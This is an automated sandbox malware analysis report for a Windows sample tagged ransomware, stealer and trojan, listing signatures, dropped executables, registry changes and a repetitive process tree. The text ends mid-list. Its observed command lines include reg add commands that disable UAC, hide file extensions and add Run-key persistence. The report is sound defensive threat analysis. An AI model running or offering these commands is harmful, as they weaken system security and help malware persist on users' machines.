Malware Analysis Report

2025-01-22 20:18

Sample ID 241020-c569lsthmc
Target 7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN
SHA256 7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591b
Tags
discovery evasion persistence ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591b

Threat Level: Known bad

The file 7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN was found to be: Known bad.

Malicious Activity Summary

discovery evasion persistence ransomware spyware stealer trojan

Modifies visibility of file extensions in Explorer

UAC bypass

Renames multiple (76) files with added filename extension

Renames multiple (52) files with added filename extension

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Adds Run key to start application

Drops file in System32 directory

System Location Discovery: System Language Discovery

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Modifies registry key

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-20 02:40

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-20 02:40

Reported

2024-10-20 02:42

Platform

win7-20240903-en

Max time kernel

120s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Renames multiple (76) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\International\Geo\Nation C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\mkcUkYkA\KGAQwQEs.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\ogogoYAQ\pSoMwskA.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\YigQsUoE.exe = "C:\\ProgramData\\KcEsUAsg\\YigQsUoE.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\KGAQwQEs.exe = "C:\\Users\\Admin\\mkcUkYkA\\KGAQwQEs.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DGQIEEQU.exe = "C:\\ProgramData\\YKcAIoYs\\DGQIEEQU.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\KGAQwQEs.exe = "C:\\Users\\Admin\\mkcUkYkA\\KGAQwQEs.exe" C:\Users\Admin\mkcUkYkA\KGAQwQEs.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DGQIEEQU.exe = "C:\\ProgramData\\YKcAIoYs\\DGQIEEQU.exe" C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DGQIEEQU.exe = "C:\\ProgramData\\YKcAIoYs\\DGQIEEQU.exe" C:\ProgramData\ogogoYAQ\pSoMwskA.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\wogYwAcY.exe = "C:\\Users\\Admin\\bsgUEsgQ\\wogYwAcY.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\mkcUkYkA C:\ProgramData\ogogoYAQ\pSoMwskA.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\mkcUkYkA\KGAQwQEs C:\ProgramData\ogogoYAQ\pSoMwskA.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\ogogoYAQ\pSoMwskA.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A (64 identical rows)

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A (64 identical rows)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A (64 identical rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2196 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Users\Admin\mkcUkYkA\KGAQwQEs.exe (4 identical rows)
PID 2196 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\ProgramData\YKcAIoYs\DGQIEEQU.exe (4 identical rows)
PID 2196 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe (4 identical rows)
PID 2544 wrote to memory of 2600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe (4 identical rows)
PID 2196 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe (4 identical rows)
PID 2196 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe (4 identical rows)
PID 2196 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe (4 identical rows)
PID 2600 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe (4 identical rows)
PID 1872 wrote to memory of 2956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe (4 identical rows)
PID 2600 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe (4 identical rows)
PID 2600 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe (4 identical rows)
PID 2600 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\reg.exe (4 identical rows)
PID 2600 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe (4 identical rows)
PID 2896 wrote to memory of 1996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe (4 identical rows)
PID 2956 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe C:\Windows\SysWOW64\cmd.exe (4 identical rows)
PID 2016 wrote to memory of 2304 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe (4 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

"C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe"

C:\Users\Admin\mkcUkYkA\KGAQwQEs.exe

"C:\Users\Admin\mkcUkYkA\KGAQwQEs.exe"

C:\ProgramData\YKcAIoYs\DGQIEEQU.exe

"C:\ProgramData\YKcAIoYs\DGQIEEQU.exe"

C:\ProgramData\ogogoYAQ\pSoMwskA.exe

C:\ProgramData\ogogoYAQ\pSoMwskA.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\EEMUcIwc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\HsMkwEQc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\fWsIoEAQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XgEIoQEk.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\laUgUQoA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZIUgUIQI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\EacgwQcI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\wUYcsgoo.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KIYcckUU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\IwoEccEQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VGYUoQUM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zqIAQYkQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\bsgUEsgQ\wogYwAcY.exe

"C:\Users\Admin\bsgUEsgQ\wogYwAcY.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 88

C:\ProgramData\KcEsUAsg\YigQsUoE.exe

"C:\ProgramData\KcEsUAsg\YigQsUoE.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 92

C:\ProgramData\IYYUUIYg\ASUAQooE.exe

C:\ProgramData\IYYUUIYg\ASUAQooE.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 44

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

